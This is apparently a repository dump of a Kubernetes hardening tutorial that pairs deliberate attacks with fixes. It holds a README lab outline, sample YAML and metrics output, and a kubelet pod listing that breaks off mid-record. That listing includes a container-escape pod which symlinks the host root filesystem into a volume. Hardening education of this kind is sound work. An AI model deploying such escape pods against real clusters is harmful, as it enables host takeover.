├── .gitignore ├── README.md ├── azure-vote.yml ├── boltbrowser.darwin64 ├── docs ├── cmd │ ├── cadvisor-metrics.md │ ├── kube-proxy-metrics.md │ ├── kubelet-metrics-cadvisor.md │ ├── kubelet-metrics.md │ ├── kubelet-pods.md │ └── kubelet-spec.md ├── create-kubeconfig.md ├── create-vpc.md ├── delete-instances.md ├── delete-vpc.md ├── deploy-basic-dashboard.md ├── deploy-heapster.md ├── deploy-kube-dns.md ├── deploy-voteapp.md ├── deploy-vulnapp.md ├── direct-controller.md ├── direct-etcd.md ├── direct-worker.md ├── enumerate-ports.md ├── full-original.md ├── kubelet-exploit.md ├── l1-api-tls.md ├── l1-security-groups.md ├── launch-configure-controller.md ├── launch-configure-etcd.md └── launch-configure-workers.md ├── etcd.dump ├── etcdctl ├── img └── arch.png └── templates └── hkfs.json /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | *.pem 3 | *.json 4 | *.csr 5 | kubeconfig 6 | *.dump 7 | *.raw 8 | etcdctl 9 | boltbrowser* 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hardening Kubernetes from Scratch 2 | 3 | The community continues to benefit from [Kubernetes the Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way) by Kelsey Hightower in understanding how each of the components work together and are configured in a reasonably secure manner, step-by-step. In a similar manner but using a slightly different approach, this guide attempts to demonstrate how the security-related settings inside ```kubernetes``` actually work from the ground up, one change at a time, validated by real attacks where possible. 4 | 5 | By following this guide, you will configure one of the *least secure* clusters possible at the start. Each step will attempt to follow the pattern of a) educate, b) attack, c) harden, and d) verify in order of security importance and maturity. Upon completion of the guide, you will have successfully hacked your cluster several times over and now fully understand all the necessary configuration changes to prevent each one from happening. 6 | 7 | This guide will hopefully do a better job explaining all the angles that couldn't fit into a [single KubeCon talk](https://www.youtube.com/watch?v=vTgQLzeBfRU). 8 | 9 | > NOTE: The cluster built in this tutorial is not production ready--especially at the beginning--but the concepts learned are definitely applicable to your production clusters. 10 | 11 | ## Target Audience 12 | 13 | The target audience for this tutorial is someone who has a working knowledge of running a Kubernetes cluster (or has completed the ```kubernetes-the-hard-way``` tutorial) and wants to understand how each security-related setting works at a deep level. 
14 | 15 | ## Cluster Software Details 16 | 17 | - [AWS EC2](https://aws.amazon.com/ec2/) 18 | - [Ubuntu 16.04 LTS](http://cloud-images.ubuntu.com/locator/ec2/) and search for `16.04 LTS hvm:ebs-ssd` 19 | - [Docker 1.13.x](https://www.docker.com) 20 | - [CNI Container Networking](https://github.com/containernetworking/cni) 0.6.0 21 | - [etcd](https://github.com/coreos/etcd) 3.2.11 22 | - [Kubernetes](https://github.com/kubernetes/kubernetes) 1.9.2 23 | 24 | 25 | ## Pre-Requisite Tools 26 | 27 | - AWS Account Credentials with permissions to: 28 |   - Create/delete VPC (subnets, route tables, internet gateways) 29 |   - Create/delete Cloudformation 30 |   - Create/delete EC2 * (security groups, keypairs, instances) 31 | - AWS CLI tools configured to use said account 32 | - bash 33 | - git 34 | - dig 35 | - kubectl (v1.9.2) 36 | - cfssl 37 | 38 | ## The (Purposefully) Insecure Cluster 39 | 40 | ### Cluster System Details 41 | 42 | - Etcd - t2.micro (10.1.0.5) 43 | - Controller - t2.small (10.1.0.10) 44 | - Worker1 - t2.small (10.1.0.11) 45 | - Worker2 - t2.small (10.1.0.12) 46 | 47 | AWS costs in `us-east-1` are just under $2/day. 48 | 49 | ### Diagram/Structure 50 | 51 | ![Cluster Architecture](img/arch.png) 52 | 53 | To keep things simple, this guide is based on a single VPC, single availability zone, single subnet architecture where all nodes have static private IPs, are assigned public IPs to enable direct SSH access, and share a security group that allows each node to have full network access to each other. 54 | 55 | ### Labs 56 | 57 | #### Build the Cluster 58 | 59 | These steps will guide you through creating the VPC, subnet, instances, and basic cluster configuration without any hardening measures in place. Pay special attention to the configuration of the security group to ensure only you have access to these systems! 60 | 61 | 1. [Create the VPC](docs/create-vpc.md) 62 | 2. [Launch and configure the `etcd` instance](docs/launch-configure-etcd.md) 63 | 3. [Launch and configure the `controller` instance](docs/launch-configure-controller.md) 64 | 4. [Launch and configure the `worker-1` and `worker-2` instances](docs/launch-configure-workers.md) 65 | 5. [Create the local `kubeconfig` file](docs/create-kubeconfig.md) 66 | 67 | #### Level 0 Security 68 | 69 | The following items are deployed to provide basic Kubernetes cluster functionality. The steps purposefully omit any security-related configuration/hardening. 70 | 71 | 1. [Deploy kube-dns](docs/deploy-kube-dns.md) 72 | 2. [Deploy Heapster](docs/deploy-heapster.md) 73 | 3. [Deploy Dashboard](docs/deploy-basic-dashboard.md) 74 | 75 | #### Level 0 Attacks 76 | 77 | At this most basic level, "Level 0", the current configuration offers very little (if any) protection from attacks that can take complete control of the cluster and its nodes. 78 | 79 | 1. [Enumerate exposed ports](docs/enumerate-ports.md) on the nodes and identify their corresponding services 80 | 2. [Probe Etcd](docs/direct-etcd.md) to compromise the data store 81 | 3. [Probe the Controller](docs/direct-controller.md) to access the API and other control plane services 82 | 4. [Probe the Worker](docs/direct-worker.md) to access the Kubelet and other worker services 83 | 84 | #### Level 1 Hardening 85 | 86 | Ouch! The security configuration of "Level 0" is not resistant to remote attacks. Let's take the very basic steps needed to prevent the "Level 0" attacks from being so straightforward. 87 | 88 | 1. 
[Improve the security group](docs/l1-security-groups.md) configuration 89 | 2. [Enable TLS](docs/l1-api-tls.md) on the externally exposed Kubernetes API 90 | 91 | #### Deploy Application Workloads 92 | 93 | With that modest amount of hardening, it's time to have this cluster perform some work. Let's deploy two sample applications: 94 | 95 | 1. [Install the "Vulnerable" application](docs/deploy-vulnapp.md) 96 | 2. [Install the Azure Vote App](docs/deploy-voteapp.md) 97 | 98 | #### Level 1 Attacks 99 | 100 | At this point, there are some fundamental resource exhaustion problems that authorized users may purposefully (or accidentally) trigger. Without any boundaries in place, deploying too many pods or pods that consume too many CPU/RAM shares can cause serious cluster availability/Denial of Service issues. When the cluster is "full", any new pods will not be scheduled. 101 | 102 | 1. Launch too many pods 103 | 2. Launch pods that consume too many CPU/RAM shares 104 | 3. Launch pods that consume all available disk space and/or inodes 105 | 106 | #### Level 2 Hardening 107 | 108 | In order to provide the proper boundaries around workloads and their resources, using separate namespaces and corresponding resource quotas can prevent the "Level 1" issues. 109 | 110 | 1. Separate workloads using Namespaces 111 | 2. Set specific Requests/Limits on Pods 112 | 3. Enforce Namespace Resource Quotas 113 | 4. Discuss multi-etcd, multi-controller 114 | 115 | #### Level 2 Attacks 116 | 1. Malicious Image, Compromised Container, Multi-tenant Misuse 117 | - Service Account Tokens 118 | - Dashboard Access 119 | - Direct Etcd Access 120 | - Tiller Access 121 | - Kubelet Exploit 122 | - Application Tampering 123 | - Metrics Scraping 124 | - Metadata API 125 | - Outbound Scanning/Pivoting 126 | 127 | #### Level 3 Hardening 128 | 1. RBAC 129 | 2. Etcd TLS 130 | 3. New Dashboard 131 | 4. Separate Kubeconfigs per user 132 | 5. Tiller TLS 133 | 6. Kubelet Authn/z 134 | 7. Network Policy/CNI 135 | 8. Admission Controllers 136 | 9. Logging? 137 | 138 | #### Level 4 Attacks 139 | 1. Malicious Image, Compromised Container, Multi-tenant Misuse 140 | - Escape the container 141 | 142 | #### Level 4 Hardening 143 | 1. Advanced admission controllers 144 | 2. Restrict images/sources 145 | 3. Network Egress filtering 146 | 4. Vuln scan images 147 | 5. Pod Security Policy 148 | 6. Encrypted etcd 149 | 7. Sysdig Falco 150 | 151 | ### Clean Up 152 | 1. [Delete Instances](docs/delete-instances.md) 153 | 2. 
[Delete VPC](docs/delete-vpc.md) 154 | 155 | ## Next Steps 156 | - [Kubernetes the Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way) - Kelsey Hightower 157 | -------------------------------------------------------------------------------- /azure-vote.yml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1beta1 2 | kind: Deployment 3 | metadata: 4 | name: azure-vote-back 5 | spec: 6 | replicas: 1 7 | template: 8 | metadata: 9 | labels: 10 | app: azure-vote-back 11 | spec: 12 | containers: 13 | - name: azure-vote-back 14 | image: redis 15 | ports: 16 | - containerPort: 6379 17 | name: redis 18 | --- 19 | apiVersion: v1 20 | kind: Service 21 | metadata: 22 | name: azure-vote-back 23 | spec: 24 | ports: 25 | - port: 6379 26 | selector: 27 | app: azure-vote-back 28 | --- 29 | apiVersion: apps/v1beta1 30 | kind: Deployment 31 | metadata: 32 | name: azure-vote-front 33 | spec: 34 | replicas: 1 35 | strategy: 36 | rollingUpdate: 37 | maxSurge: 1 38 | maxUnavailable: 1 39 | minReadySeconds: 5 40 | template: 41 | metadata: 42 | labels: 43 | app: azure-vote-front 44 | spec: 45 | containers: 46 | - name: azure-vote-front 47 | image: microsoft/azure-vote-front:v1 48 | ports: 49 | - containerPort: 80 50 | resources: 51 | requests: 52 | cpu: 250m 53 | limits: 54 | cpu: 500m 55 | env: 56 | - name: REDIS 57 | value: "azure-vote-back" 58 | -------------------------------------------------------------------------------- /boltbrowser.darwin64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hardening-kubernetes/from-scratch/983dbe2c225ce62d696791a453a790c5b3b05ad4/boltbrowser.darwin64 -------------------------------------------------------------------------------- /docs/cmd/kube-proxy-metrics.md: -------------------------------------------------------------------------------- 1 | [Back](/docs/direct-controller.md) 2 | 3 | ``` 4 | # HELP go_gc_duration_seconds A summary of the GC invocation durations. 5 | # TYPE go_gc_duration_seconds summary 6 | go_gc_duration_seconds{quantile="0"} 1.4315e-05 7 | go_gc_duration_seconds{quantile="0.25"} 1.6346e-05 8 | go_gc_duration_seconds{quantile="0.5"} 1.7508e-05 9 | go_gc_duration_seconds{quantile="0.75"} 1.8822e-05 10 | go_gc_duration_seconds{quantile="1"} 0.000170554 11 | go_gc_duration_seconds_sum 0.14788704 12 | go_gc_duration_seconds_count 7560 13 | # HELP go_goroutines Number of goroutines that currently exist. 14 | # TYPE go_goroutines gauge 15 | go_goroutines 46 16 | # HELP go_memstats_alloc_bytes Number of bytes allocated and still in use. 17 | # TYPE go_memstats_alloc_bytes gauge 18 | go_memstats_alloc_bytes 5.414368e+06 19 | # HELP go_memstats_alloc_bytes_total Total number of bytes allocated, even if freed. 20 | # TYPE go_memstats_alloc_bytes_total counter 21 | go_memstats_alloc_bytes_total 3.90601344e+09 22 | # HELP go_memstats_buck_hash_sys_bytes Number of bytes used by the profiling bucket hash table. 23 | # TYPE go_memstats_buck_hash_sys_bytes gauge 24 | go_memstats_buck_hash_sys_bytes 1.657035e+06 25 | # HELP go_memstats_frees_total Total number of frees. 26 | # TYPE go_memstats_frees_total counter 27 | go_memstats_frees_total 5.6292182e+07 28 | # HELP go_memstats_gc_cpu_fraction The fraction of this program's available CPU time used by the GC since the program started. 
29 | # TYPE go_memstats_gc_cpu_fraction gauge 30 | go_memstats_gc_cpu_fraction 3.5323944520522376e-05 31 | # HELP go_memstats_gc_sys_bytes Number of bytes used for garbage collection system metadata. 32 | # TYPE go_memstats_gc_sys_bytes gauge 33 | go_memstats_gc_sys_bytes 516096 34 | # HELP go_memstats_heap_alloc_bytes Number of heap bytes allocated and still in use. 35 | # TYPE go_memstats_heap_alloc_bytes gauge 36 | go_memstats_heap_alloc_bytes 5.414368e+06 37 | # HELP go_memstats_heap_idle_bytes Number of heap bytes waiting to be used. 38 | # TYPE go_memstats_heap_idle_bytes gauge 39 | go_memstats_heap_idle_bytes 1.400832e+06 40 | # HELP go_memstats_heap_inuse_bytes Number of heap bytes that are in use. 41 | # TYPE go_memstats_heap_inuse_bytes gauge 42 | go_memstats_heap_inuse_bytes 7.479296e+06 43 | # HELP go_memstats_heap_objects Number of allocated objects. 44 | # TYPE go_memstats_heap_objects gauge 45 | go_memstats_heap_objects 29224 46 | # HELP go_memstats_heap_released_bytes Number of heap bytes released to OS. 47 | # TYPE go_memstats_heap_released_bytes gauge 48 | go_memstats_heap_released_bytes 1.253376e+06 49 | # HELP go_memstats_heap_sys_bytes Number of heap bytes obtained from system. 50 | # TYPE go_memstats_heap_sys_bytes gauge 51 | go_memstats_heap_sys_bytes 8.880128e+06 52 | # HELP go_memstats_last_gc_time_seconds Number of seconds since 1970 of last garbage collection. 53 | # TYPE go_memstats_last_gc_time_seconds gauge 54 | go_memstats_last_gc_time_seconds 1.522204157873937e+09 55 | # HELP go_memstats_lookups_total Total number of pointer lookups. 56 | # TYPE go_memstats_lookups_total counter 57 | go_memstats_lookups_total 3.74748e+06 58 | # HELP go_memstats_mallocs_total Total number of mallocs. 59 | # TYPE go_memstats_mallocs_total counter 60 | go_memstats_mallocs_total 5.6321406e+07 61 | # HELP go_memstats_mcache_inuse_bytes Number of bytes in use by mcache structures. 62 | # TYPE go_memstats_mcache_inuse_bytes gauge 63 | go_memstats_mcache_inuse_bytes 1736 64 | # HELP go_memstats_mcache_sys_bytes Number of bytes used for mcache structures obtained from system. 65 | # TYPE go_memstats_mcache_sys_bytes gauge 66 | go_memstats_mcache_sys_bytes 16384 67 | # HELP go_memstats_mspan_inuse_bytes Number of bytes in use by mspan structures. 68 | # TYPE go_memstats_mspan_inuse_bytes gauge 69 | go_memstats_mspan_inuse_bytes 100472 70 | # HELP go_memstats_mspan_sys_bytes Number of bytes used for mspan structures obtained from system. 71 | # TYPE go_memstats_mspan_sys_bytes gauge 72 | go_memstats_mspan_sys_bytes 114688 73 | # HELP go_memstats_next_gc_bytes Number of heap bytes when next garbage collection will take place. 74 | # TYPE go_memstats_next_gc_bytes gauge 75 | go_memstats_next_gc_bytes 1.0238944e+07 76 | # HELP go_memstats_other_sys_bytes Number of bytes used for other system allocations. 77 | # TYPE go_memstats_other_sys_bytes gauge 78 | go_memstats_other_sys_bytes 491565 79 | # HELP go_memstats_stack_inuse_bytes Number of bytes in use by the stack allocator. 80 | # TYPE go_memstats_stack_inuse_bytes gauge 81 | go_memstats_stack_inuse_bytes 557056 82 | # HELP go_memstats_stack_sys_bytes Number of bytes obtained from system for stack allocator. 83 | # TYPE go_memstats_stack_sys_bytes gauge 84 | go_memstats_stack_sys_bytes 557056 85 | # HELP go_memstats_sys_bytes Number of bytes obtained from system. 
86 | # TYPE go_memstats_sys_bytes gauge 87 | go_memstats_sys_bytes 1.2232952e+07 88 | # HELP go_threads Number of OS threads created 89 | # TYPE go_threads gauge 90 | go_threads 6 91 | # HELP http_request_duration_microseconds The HTTP request latencies in microseconds. 92 | # TYPE http_request_duration_microseconds summary 93 | http_request_duration_microseconds{handler="prometheus",quantile="0.5"} NaN 94 | http_request_duration_microseconds{handler="prometheus",quantile="0.9"} NaN 95 | http_request_duration_microseconds{handler="prometheus",quantile="0.99"} NaN 96 | http_request_duration_microseconds_sum{handler="prometheus"} 7457.3460000000005 97 | http_request_duration_microseconds_count{handler="prometheus"} 3 98 | # HELP http_request_size_bytes The HTTP request sizes in bytes. 99 | # TYPE http_request_size_bytes summary 100 | http_request_size_bytes{handler="prometheus",quantile="0.5"} NaN 101 | http_request_size_bytes{handler="prometheus",quantile="0.9"} NaN 102 | http_request_size_bytes{handler="prometheus",quantile="0.99"} NaN 103 | http_request_size_bytes_sum{handler="prometheus"} 192 104 | http_request_size_bytes_count{handler="prometheus"} 3 105 | # HELP http_requests_total Total number of HTTP requests made. 106 | # TYPE http_requests_total counter 107 | http_requests_total{code="200",handler="prometheus",method="get"} 3 108 | # HELP http_response_size_bytes The HTTP response sizes in bytes. 109 | # TYPE http_response_size_bytes summary 110 | http_response_size_bytes{handler="prometheus",quantile="0.5"} NaN 111 | http_response_size_bytes{handler="prometheus",quantile="0.9"} NaN 112 | http_response_size_bytes{handler="prometheus",quantile="0.99"} NaN 113 | http_response_size_bytes_sum{handler="prometheus"} 50521 114 | http_response_size_bytes_count{handler="prometheus"} 3 115 | # HELP kubeproxy_sync_proxy_rules_latency_microseconds SyncProxyRules latency 116 | # TYPE kubeproxy_sync_proxy_rules_latency_microseconds histogram 117 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="1000"} 1 118 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="2000"} 1 119 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="4000"} 1 120 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="8000"} 1 121 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="16000"} 26338 122 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="32000"} 30181 123 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="64000"} 30203 124 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="128000"} 30209 125 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="256000"} 30211 126 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="512000"} 30211 127 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="1.024e+06"} 30218 128 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="2.048e+06"} 30218 129 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="4.096e+06"} 30218 130 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="8.192e+06"} 30218 131 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="1.6384e+07"} 30218 132 | kubeproxy_sync_proxy_rules_latency_microseconds_bucket{le="+Inf"} 30218 133 | kubeproxy_sync_proxy_rules_latency_microseconds_sum 4.1572652e+08 134 | kubeproxy_sync_proxy_rules_latency_microseconds_count 30218 135 | # HELP kubernetes_build_info A metric with a constant '1' value labeled by major, minor, git version, git commit, git tree state, build date, Go version, and compiler from 
which Kubernetes was built, and platform on which it is running. 136 | # TYPE kubernetes_build_info gauge 137 | kubernetes_build_info{buildDate="2018-01-18T09:42:01Z",compiler="gc",gitCommit="5fa2db2bd46ac79e5e00a4e6ed24191080aa463b",gitTreeState="clean",gitVersion="v1.9.2",goVersion="go1.9.2",major="1",minor="9",platform="linux/amd64"} 1 138 | # HELP process_cpu_seconds_total Total user and system CPU time spent in seconds. 139 | # TYPE process_cpu_seconds_total counter 140 | process_cpu_seconds_total 763.05 141 | # HELP process_max_fds Maximum number of open file descriptors. 142 | # TYPE process_max_fds gauge 143 | process_max_fds 1024 144 | # HELP process_open_fds Number of open file descriptors. 145 | # TYPE process_open_fds gauge 146 | process_open_fds 12 147 | # HELP process_resident_memory_bytes Resident memory size in bytes. 148 | # TYPE process_resident_memory_bytes gauge 149 | process_resident_memory_bytes 3.6507648e+07 150 | # HELP process_start_time_seconds Start time of the process since unix epoch in seconds. 151 | # TYPE process_start_time_seconds gauge 152 | process_start_time_seconds 1.52129734617e+09 153 | # HELP process_virtual_memory_bytes Virtual memory size in bytes. 154 | # TYPE process_virtual_memory_bytes gauge 155 | process_virtual_memory_bytes 5.1458048e+07 156 | # HELP rest_client_request_latency_seconds Request latency in seconds. Broken down by verb and URL. 157 | # TYPE rest_client_request_latency_seconds histogram 158 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.001"} 10 159 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.002"} 10 160 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.004"} 11 161 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.008"} 11 162 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.016"} 12 163 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.032"} 12 164 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.064"} 12 165 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.128"} 12 166 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.256"} 12 167 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.512"} 12 168 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="+Inf"} 12 169 | rest_client_request_latency_seconds_sum{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET"} 0.015057069 170 | 
rest_client_request_latency_seconds_count{url="http://10.1.0.10:8080/api/v1/endpoints?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET"} 12 171 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.001"} 2 172 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.002"} 2 173 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.004"} 3 174 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.008"} 3 175 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.016"} 3 176 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.032"} 3 177 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.064"} 3 178 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.128"} 3 179 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.256"} 3 180 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="0.512"} 3 181 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST",le="+Inf"} 3 182 | rest_client_request_latency_seconds_sum{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST"} 0.00392318 183 | rest_client_request_latency_seconds_count{url="http://10.1.0.10:8080/api/v1/namespaces/%7Bnamespace%7D/events",verb="POST"} 3 184 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.001"} 0 185 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.002"} 0 186 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.004"} 0 187 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.008"} 1 188 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.016"} 1 189 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.032"} 1 190 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.064"} 1 191 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.128"} 1 192 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.256"} 1 193 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="0.512"} 1 194 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET",le="+Inf"} 1 195 | rest_client_request_latency_seconds_sum{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET"} 0.007660857 196 | 
rest_client_request_latency_seconds_count{url="http://10.1.0.10:8080/api/v1/nodes/%7Bname%7D",verb="GET"} 1 197 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.001"} 11 198 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.002"} 11 199 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.004"} 11 200 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.008"} 11 201 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.016"} 12 202 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.032"} 12 203 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.064"} 12 204 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.128"} 12 205 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.256"} 12 206 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="0.512"} 12 207 | rest_client_request_latency_seconds_bucket{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET",le="+Inf"} 12 208 | rest_client_request_latency_seconds_sum{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET"} 0.01068198 209 | rest_client_request_latency_seconds_count{url="http://10.1.0.10:8080/api/v1/services?limit=%7Bvalue%7D&resourceVersion=%7Bvalue%7D",verb="GET"} 12 210 | # HELP rest_client_requests_total Number of HTTP requests, partitioned by status code, method, and host. 
211 | # TYPE rest_client_requests_total counter 212 | rest_client_requests_total{code="200",host="10.1.0.10:8080",method="GET"} 4042 213 | rest_client_requests_total{code="201",host="10.1.0.10:8080",method="POST"} 1 214 | rest_client_requests_total{code="",host="10.1.0.10:8080",method="GET"} 23 215 | rest_client_requests_total{code="",host="10.1.0.10:8080",method="POST"} 2 216 | ``` 217 | -------------------------------------------------------------------------------- /docs/cmd/kubelet-pods.md: -------------------------------------------------------------------------------- 1 | [Back](/docs/direct-controller.md) 2 | 3 | ``` 4 | { 5 | "kind": "PodList", 6 | "apiVersion": "v1", 7 | "metadata": {}, 8 | "items": [ 9 | { 10 | "metadata": { 11 | "name": "subpath", 12 | "namespace": "default", 13 | "selfLink": "/api/v1/namespaces/default/pods/subpath", 14 | "uid": "3fb02fa6-2e9e-11e8-9d04-06d7638bd978", 15 | "resourceVersion": "418027", 16 | "creationTimestamp": "2018-03-23T13:29:44Z", 17 | "annotations": { 18 | "kubernetes.io/config.seen": "2018-03-23T13:29:44.306996903Z", 19 | "kubernetes.io/config.source": "api" 20 | } 21 | }, 22 | "spec": { 23 | "volumes": [ 24 | { 25 | "name": "escape-volume", 26 | "emptyDir": {} 27 | }, 28 | { 29 | "name": "status-volume", 30 | "emptyDir": {} 31 | } 32 | ], 33 | "containers": [ 34 | { 35 | "name": "setup", 36 | "image": "nginx:latest", 37 | "command": [ 38 | "/bin/bash" 39 | ], 40 | "args": [ 41 | "-c", 42 | "cd /rootfs && rm -rf hostetc && ln -s / /rootfs/host && touch /status/done && sleep infinity" 43 | ], 44 | "resources": {}, 45 | "volumeMounts": [ 46 | { 47 | "name": "escape-volume", 48 | "mountPath": "/rootfs" 49 | }, 50 | { 51 | "name": "status-volume", 52 | "mountPath": "/status" 53 | } 54 | ], 55 | "terminationMessagePath": "/dev/termination-log", 56 | "terminationMessagePolicy": "File", 57 | "imagePullPolicy": "Always", 58 | "securityContext": { 59 | "capabilities": { 60 | "drop": [ 61 | "CHOWN", 62 | "DAC_OVERRIDE", 63 | "FOWNER", 64 | "FSETID", 65 | "KILL", 66 | "SETGID", 67 | "SETUID", 68 | "SETPCAP", 69 | "NET_BIND_SERVICE", 70 | "NET_ADMIN", 71 | "NET_RAW", 72 | "MKNOD", 73 | "AUDIT_WRITE" 74 | ] 75 | }, 76 | "allowPrivilegeEscalation": 